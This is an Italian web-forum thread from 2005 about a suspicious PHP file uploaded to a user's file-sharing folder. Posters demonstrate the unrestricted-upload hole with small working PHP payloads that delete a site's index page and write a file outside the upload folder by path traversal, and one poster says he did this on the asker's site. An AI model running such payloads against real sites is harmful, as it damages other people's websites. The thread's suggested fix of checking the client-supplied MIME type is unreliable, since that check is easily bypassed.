LinkBack URL
About LinkBacksciao a tutti,
mi hanno uppato questo file di recente
http://aquanox.altervista.org/filema.../altro/ops.php
sapete che roba sia?
grazie
Visualizzazione risultati 1 fino 13 di 13
Discussione: Strano file uppato nel mio sharehouse
-
12-09-2005, 18.27.55 #1Guest
Strano file uppato nel mio sharehouse
-
12-09-2005, 18.32.04 #2
Altervistiano Junior
- Data registrazione
- 16-01-2004
- Residenza
- 127.0.0.1
- Messaggi
- 547
Beh forse ci ha scritto
e per sicurezza nn far uploadare i file php: sono pericolosi!Codice PHP:<? phpinfo(); ?>Dal server 5 con amore
-
12-09-2005, 18.45.57 #3Guest
non ho capito...
-
12-09-2005, 19.06.51 #4
Altervistiano Junior
- Data registrazione
- 16-01-2004
- Residenza
- 127.0.0.1
- Messaggi
- 547
QUELLO e codice PHP! Quando si e' uploadato il codice funziona e si vede come codice html. Prova a vedere http://pokestudio.altervista.org/info.php! C'e' scritto solamente il codice che ho postato
Dal server 5 con amore
-
12-09-2005, 19.08.37 #5Guest
si ma praticamente che fa?
-
12-09-2005, 19.13.07 #6
Altervistiano Junior
- Data registrazione
- 16-01-2004
- Residenza
- 127.0.0.1
- Messaggi
- 547
Quel codice ti stampa le info di php. Ma se qualcuno ti cancellasse la home con questo codice?
Provalo a metterlo nella radice del sito (ihih.php) backuppando l'indexCodice PHP:<?php
unlink("index.htm");
echo "ahahahahah!";
?>Dal server 5 con amore
-
12-09-2005, 19.21.16 #7Guest
non vedo come potrebbe fare, dato che nessuno ha i permessi di uscire dalla cartella share e nessuno può modificare i file presenti all'interno dello ShareHouse, fai una prova!
-
12-09-2005, 19.51.10 #8Guest
nn è discorso di permssi basta ke tu da una cartella metti quello script sistemando gli url funzia tutto nn far uppare i file php
-
12-09-2005, 20.17.24 #9
AlterGuru 2500
- Data registrazione
- 17-08-2003
- Residenza
- Palermo
- Messaggi
- 3,300
Jostock ha ragione ma io te lo dimostro concretamente:
http://aquanox.altervista.org/marcio.html
togli la possibilità di uppare file php,php3 ecc... subito!!
-
12-09-2005, 21.13.30 #10Guest
UUUUUUL !!!
Ma come hai fatto?
-
12-09-2005, 21.54.32 #11
AlterGuru 2500
- Data registrazione
- 17-08-2003
- Residenza
- Palermo
- Messaggi
- 3,300
bellino eh :)
ho semplicemente uppato il file prova.php:
poi mi è bastato richiamarlo da browser per farlo eseguireCodice PHP:<?
$fp = fopen("../../../marcio.html","w");
$fw = fwrite($fp, "marcio è stato qui e ti mostra la vulnerabilità");
fclose($fp);
?>
in pratica fwrite serve per creare file, i caratteri "../" servono per indicare la cartella precedente,ho visto quante cartelle c'erano prima della home e ne ho inseriti 3..
-
12-09-2005, 22.13.29 #12Guest
devi bloccare con degli if tipo
e continui cosi x tutti i file da bloccareCodice PHP:if($_FILES['nome campo form']['type']=="application/octet-stream") {
echo"File php nn ammessi";
}elseif($_FILES['nome campo form']['type']=="text/html") {
echo"File html nn ammessi";
}else{
tutto quello ke deve fare se è tutto giusto
}
-
13-09-2005, 13.40.30 #13Guest
ho risolto... ho direttamente cambiato tutto il sito :))
